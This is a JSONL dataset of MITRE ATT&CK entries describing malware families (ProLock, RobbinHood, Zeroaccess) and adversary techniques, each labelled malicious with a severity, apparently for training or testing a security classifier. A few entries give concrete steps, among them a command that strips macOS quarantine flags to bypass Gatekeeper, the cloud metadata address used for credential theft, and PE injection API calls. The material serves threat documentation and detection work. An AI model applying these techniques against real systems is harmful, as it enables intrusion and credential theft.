{"id": "mitre_00093", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# ProLock\n\nType: malware\nPlatforms: Windows\n\n[ProLock](https://attack.mitre.org/software/S0654) is a ransomware strain that has been used in Big Game Hunting (BGH) operations since at least 2020, often obtaining initial access with [QakBot](https://attack.mitre.org/software/S0650). [ProLock](https://attack.mitre.org/software/S0654) is the successor to PwndLocker ransomware which was found to contain a bug allowing decryption without ransom payment in 2019.(Citation: Group IB Ransomware September 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "ProLock", "malware_type": "malware"}}]}
{"id": "mitre_00094", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Malicious Image\n\nTechnique: T1204.003\nTactics: execution\nPlatforms: IaaS, Containers\n\nAdversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)\n\nAdversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: [Match Legitimate Resource Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: Aqua Security Cloud Native Threat Report June 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1204.003", "technique_name": "Malicious Image", "tactics": ["execution"]}}]}
{"id": "mitre_00095", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# RogueRobin\n\nType: malware\nPlatforms: Windows\n\n[RogueRobin](https://attack.mitre.org/software/S0270) is a payload used by [DarkHydrus](https://attack.mitre.org/groups/G0079) that has been developed in PowerShell and C#. (Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit42 DarkHydrus Jan 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "RogueRobin", "malware_type": "malware"}}]}
{"id": "mitre_00096", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Cloud Instance Metadata API\n\nTechnique: T1522\nTactics: credential-access\nPlatforms: IaaS\n\nAdversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.\n\nMost cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API)\n\nIf adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)\n\nThe de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.\n", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1522", "technique_name": "Cloud Instance Metadata API", "tactics": ["credential-access"]}}]}
{"id": "mitre_00097", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Modify Cloud Resource Hierarchy\n\nTechnique: T1666\nTactics: defense-evasion\nPlatforms: IaaS\n\nAdversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses. \n\nIaaS environments often group resources into a hierarchy, enabling improved resource management and application of policies to relevant groups. Hierarchical structures differ among cloud providers. For example, in AWS environments, multiple accounts can be grouped under a single organization, while in Azure environments, multiple subscriptions can be grouped under a single management group.(Citation: AWS Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add, delete, or otherwise modify resource groups within an IaaS hierarchy. For example, in Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources. They may also engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant. This will allow the adversary to use the victim\u2019s compute resources without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm 2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments, adversaries with appropriate permissions in a given account may call the `LeaveOrganization` API, causing the account to be severed from the AWS Organization to which it was tied and removing any Service Control Policies, guardrails, or restrictions imposed upon it by its former Organization. Alternatively, adversaries may call the `CreateAccount` API in order to create a new account within an AWS Organization. This account will use the same payment methods registered to the payment account but may not be subject to existing detections or Service Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1666", "technique_name": "Modify Cloud Resource Hierarchy", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00098", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# LoFiSe\n\nType: malware\nPlatforms: Windows\n\n[LoFiSe](https://attack.mitre.org/software/S1101) has been used by [ToddyCat](https://attack.mitre.org/groups/G1022) since at least 2023 to identify and collect files of interest on targeted systems.(Citation: Kaspersky ToddyCat Check Logs October 2023)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "LoFiSe", "malware_type": "malware"}}]}
{"id": "mitre_00099", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Poisoned Pipeline Execution\n\nTechnique: T1677\nTactics: execution\nPlatforms: SaaS\n\nAdversaries may manipulate continuous integration / continuous development (CI/CD) processes by injecting malicious code into the build process. There are several mechanisms for poisoning pipelines: \n\n* In a Direct Pipeline Execution scenario, the threat actor directly modifies the CI configuration file (e.g., `gitlab-ci.yml` in GitLab). They may include a command to exfiltrate credentials leveraged in the build process to a remote server, or to export them as a workflow artifact.(Citation: Unit 42 Palo Alto GitHub Actions Supply Chain Attack 2025)(Citation: OWASP CICD-SEC-4)\n* In an Indirect Pipeline Execution scenario, the threat actor injects malicious code into files referenced by the CI configuration file. These may include makefiles, scripts, unit tests, and linters.(Citation: OWASP CICD-SEC-4)\n* In a Public Pipeline Execution scenario, the threat actor does not have direct access to the repository but instead creates a malicious pull request from a fork that triggers a part of the CI/CD pipeline. For example, in GitHub Actions, the `pull_request_target` trigger allows workflows running from forked repositories to access secrets. If this trigger is combined with an explicit pull request checkout and a location for a threat actor to insert malicious code (e.g., an `npm build` command), a threat actor may be able to leak pipeline credentials.(Citation: Unit 42 Palo Alto GitHub Actions Supply Chain Attack 2025)(Citation: GitHub Security Lab GitHub Actions Security 2021) Similarly, threat actors may craft pull requests with malicious inputs (such as branch names) if the build pipeline treats those inputs as trusted.(Citation: Wiz Ultralytics AI Library Hijack 2024)(Citation: Synactiv Hijacking GitHub Runners)(Citation: GitHub Security Labs GitHub Actions Security Part 2 2021) Finally, if a pipeline leverages a self-hosted runner, a threat actor may be able to execute arbitrary code on a host inside the organization\u2019s network.(Citation: John Stawinski PyTorch Supply Chain Attack 2024)\n\nBy poisoning CI/CD pipelines, threat actors may be able to gain access to credentials, laterally move to additional hosts, or input malicious components to be shipped further down the pipeline (i.e., [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195)). ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1677", "technique_name": "Poisoned Pipeline Execution", "tactics": ["execution"]}}]}
{"id": "mitre_00100", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Dynamic Data Exchange\n\nTechnique: T1559.002\nTactics: execution\nPlatforms: Windows\n\nAdversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\n\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017)\n\nMicrosoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection )\n\nDDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1559.002", "technique_name": "Dynamic Data Exchange", "tactics": ["execution"]}}]}
{"id": "mitre_00101", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Backdoor.Oldrea\n\nType: malware\nPlatforms: Windows\n\n[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a modular backdoor that used by [Dragonfly](https://attack.mitre.org/groups/G0035) against energy companies since at least 2013. [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)(Citation: Symantec Dragonfly Sept 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Backdoor.Oldrea", "malware_type": "malware"}}]}
{"id": "mitre_00102", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Zeroaccess\n\nType: malware\n\n[Zeroaccess](https://attack.mitre.org/software/S0027) is a kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that attempts to add victims to the ZeroAccess botnet, often for monetary gain. (Citation: Sophos ZeroAccess)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Zeroaccess", "malware_type": "malware"}}]}
{"id": "mitre_00103", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Botnet\n\nTechnique: T1583.005\nTactics: resource-development\nPlatforms: PRE\n\nAdversaries may buy, lease, or rent a network of compromised systems\u00a0that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. \n\nInternet-facing edge devices and related network appliances that are end-of-life (EOL) and unsupported by their manufacturers are commonly acquired for botnet activities. Adversaries may lease operational relay box (ORB) networks \u2013 consisting of virtual private servers (VPS), small office/home office (SOHO) routers, or Internet of Things (IoT) devices \u2013 to serve as a botnet.(Citation: ORB Mandiant) \n\nWith a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter) Acquired botnets may also be used to support Command and Control activity, such as [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) through an established [Proxy](https://attack.mitre.org/techniques/T1090) network.\n\n", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1583.005", "technique_name": "Botnet", "tactics": ["resource-development"]}}]}
{"id": "mitre_00104", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# PoetRAT\n\nType: malware\nPlatforms: Windows\n\n[PoetRAT](https://attack.mitre.org/software/S0428) is a remote access trojan (RAT) that was first identified in April 2020. [PoetRAT](https://attack.mitre.org/software/S0428) has been used in multiple campaigns against the private and public sectors in Azerbaijan, including ICS and SCADA systems in the energy sector. The STIBNITE activity group has been observed using the malware. [PoetRAT](https://attack.mitre.org/software/S0428) derived its name from references in the code to poet William Shakespeare. (Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)(Citation: Dragos Threat Report 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "PoetRAT", "malware_type": "malware"}}]}
{"id": "mitre_00105", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# RobbinHood\n\nType: malware\nPlatforms: Windows\n\n[RobbinHood](https://attack.mitre.org/software/S0400) is ransomware that was first observed being used in an attack against the Baltimore city government's computer network.(Citation: CarbonBlack RobbinHood May 2019)(Citation: BaltimoreSun RobbinHood May 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "RobbinHood", "malware_type": "malware"}}]}
{"id": "mitre_00106", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Gatekeeper Bypass\n\nTechnique: T1144\nTactics: defense-evasion\nPlatforms: macOS\n\nIn macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called com.apple.quarantine. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution. \n\nApps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won\u2019t set this flag. Additionally, other utilities or events like drive-by downloads don\u2019t necessarily set it either. This completely bypasses the built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence of the quarantine flag can be checked by the xattr command xattr /path/to/MyApp.app for com.apple.quarantine. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app. (Citation: Clearing quarantine attribute) (Citation: OceanLotus for OS X)\n \nIn typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS\u2019s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. (Citation: Bypassing Gatekeeper)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1144", "technique_name": "Gatekeeper Bypass", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00107", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Agent.btz\n\nType: malware\nPlatforms: Windows\n\n[Agent.btz](https://attack.mitre.org/software/S0092) is a worm that primarily spreads itself via removable devices such as USB drives. It reportedly infected U.S. military networks in 2008. (Citation: Securelist Agent.btz)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Agent.btz", "malware_type": "malware"}}]}
{"id": "mitre_00108", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Net\n\nType: tool\nPlatforms: Windows\n\nThe [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft Net Utility)\n\n[Net](https://attack.mitre.org/software/S0039) has a great deal of functionality, (Citation: Savill 1999) much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) using net use commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as net1 user.", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Net", "malware_type": "tool"}}]}
{"id": "mitre_00109", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SDBbot\n\nType: malware\nPlatforms: Windows\n\n[SDBbot](https://attack.mitre.org/software/S0461) is a backdoor with installer and loader components that has been used by [TA505](https://attack.mitre.org/groups/G0092) since at least 2019.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "SDBbot", "malware_type": "malware"}}]}
{"id": "mitre_00110", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Portable Executable Injection\n\nTechnique: T1055.002\nTactics: defense-evasion, privilege-escalation\nPlatforms: Windows\n\nAdversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process. \n\nPE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. (Citation: Elastic Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1055.002", "technique_name": "Portable Executable Injection", "tactics": ["defense-evasion", "privilege-escalation"]}}]}
{"id": "mitre_00111", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Unix Shell\n\nTechnique: T1059.004\nTactics: execution\nPlatforms: ESXi, Linux, macOS, Network Devices\n\nAdversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many variations of the Unix shell exist (e.g. sh, ash, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.\n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.\n\nSome systems, such as embedded devices, lightweight Linux distributions, and ESXi servers, may leverage stripped-down Unix shells via Busybox, a small executable that contains a variety of tools, including a simple shell.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1059.004", "technique_name": "Unix Shell", "tactics": ["execution"]}}]}
{"id": "mitre_00112", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Nebulae\n\nType: malware\nPlatforms: Windows\n\n[Nebulae](https://attack.mitre.org/software/S0630) Is a backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since at least 2020.(Citation: Bitdefender Naikon April 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Nebulae", "malware_type": "malware"}}]}
{"id": "mitre_00113", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# VersaMem\n\nType: malware\nPlatforms: Network Devices\n\n[VersaMem](https://attack.mitre.org/software/S1154) is a web shell designed for deployment to Versa Director servers following exploitation. Discovered in August 2024, [VersaMem](https://attack.mitre.org/software/S1154) was used during [Versa Director Zero Day Exploitation](https://attack.mitre.org/campaigns/C0039) by [Volt Typhoon](https://attack.mitre.org/groups/G1017) to target ISPs and MSPs. [VersaMem](https://attack.mitre.org/software/S1154) is deployed as a Java Archive (JAR) and allows for credential capture for Versa Director logon activity as well as follow-on execution of arbitrary Java payloads.(Citation: Lumen Versa 2024)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "VersaMem", "malware_type": "malware"}}]}
{"id": "mitre_00114", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# ThreatNeedle\n\nType: malware\nPlatforms: Windows\n\n[ThreatNeedle](https://attack.mitre.org/software/S0665) is a backdoor that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2019 to target cryptocurrency, defense, and mobile gaming organizations. It is considered to be an advanced cluster of [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Manuscrypt (a.k.a. NukeSped) malware family.(Citation: Kaspersky ThreatNeedle Feb 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "ThreatNeedle", "malware_type": "malware"}}]}
{"id": "mitre_00115", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# PowerShell\n\nTechnique: T1086\nTactics: execution\nPlatforms: Windows\n\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1086", "technique_name": "PowerShell", "tactics": ["execution"]}}]}
{"id": "mitre_00116", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# HyperBro\n\nType: malware\nPlatforms: Windows\n\n[HyperBro](https://attack.mitre.org/software/S0398) is a custom in-memory backdoor used by [Threat Group-3390](https://attack.mitre.org/groups/G0027).(Citation: Unit42 Emissary Panda May 2019)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "HyperBro", "malware_type": "malware"}}]}
{"id": "mitre_00117", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# AppInit DLLs\n\nTechnique: T1103\nTactics: persistence, privilege-escalation\nPlatforms: Windows\n\nDynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry)\n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1103", "technique_name": "AppInit DLLs", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00118", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Screen Capture\n\nTechnique: T1113\nTactics: collection\nPlatforms: Linux, Windows, macOS\n\nAdversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)\n", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1113", "technique_name": "Screen Capture", "tactics": ["collection"]}}]}
{"id": "mitre_00119", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# HDoor\n\nType: malware\nPlatforms: Windows\n\n[HDoor](https://attack.mitre.org/software/S0061) is malware that has been customized and used by the [Naikon](https://attack.mitre.org/groups/G0019) group. (Citation: Baumgartner Naikon 2015)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "HDoor", "malware_type": "malware"}}]}
{"id": "mitre_00120", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Account Discovery\n\nTechnique: T1087\nTactics: discovery\nPlatforms: ESXi, IaaS, Identity Provider, Linux, macOS, Office Suite, SaaS, Windows\n\nAdversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).\n\nAdversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.\n\nFor examples, cloud environments typically provide easily accessible interfaces to obtain user lists.(Citation: AWS List Users)(Citation: Google Cloud - IAM Servie Accounts List API) On hosts, adversaries can use default [PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system\u2019s files.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1087", "technique_name": "Account Discovery", "tactics": ["discovery"]}}]}
{"id": "mitre_00121", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Pass the Ticket\n\nTechnique: T1550.003\nTactics: defense-evasion, lateral-movement\nPlatforms: Windows\n\nAdversaries may \u201cpass the ticket\u201d using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\n\nWhen preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket)\n\nA [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)\n\nA [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)\n\nAdversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, \"overpassing the hash\" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1550.003", "technique_name": "Pass the Ticket", "tactics": ["defense-evasion", "lateral-movement"]}}]}
{"id": "mitre_00122", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SynAck\n\nType: malware\nPlatforms: Windows\n\n[SynAck](https://attack.mitre.org/software/S0242) is variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. (Citation: SecureList SynAck Doppelg\u00e4nging May 2018) (Citation: Kaspersky Lab SynAck May 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "SynAck", "malware_type": "malware"}}]}
{"id": "mitre_00123", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Firmware Corruption\n\nTechnique: T1495\nTactics: impact\nPlatforms: Linux, macOS, Network Devices, Windows\n\nAdversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.\n\nIn general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs_ukraine) Depending on the device, this attack may also result in [Data Destruction](https://attack.mitre.org/techniques/T1485). ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1495", "technique_name": "Firmware Corruption", "tactics": ["impact"]}}]}
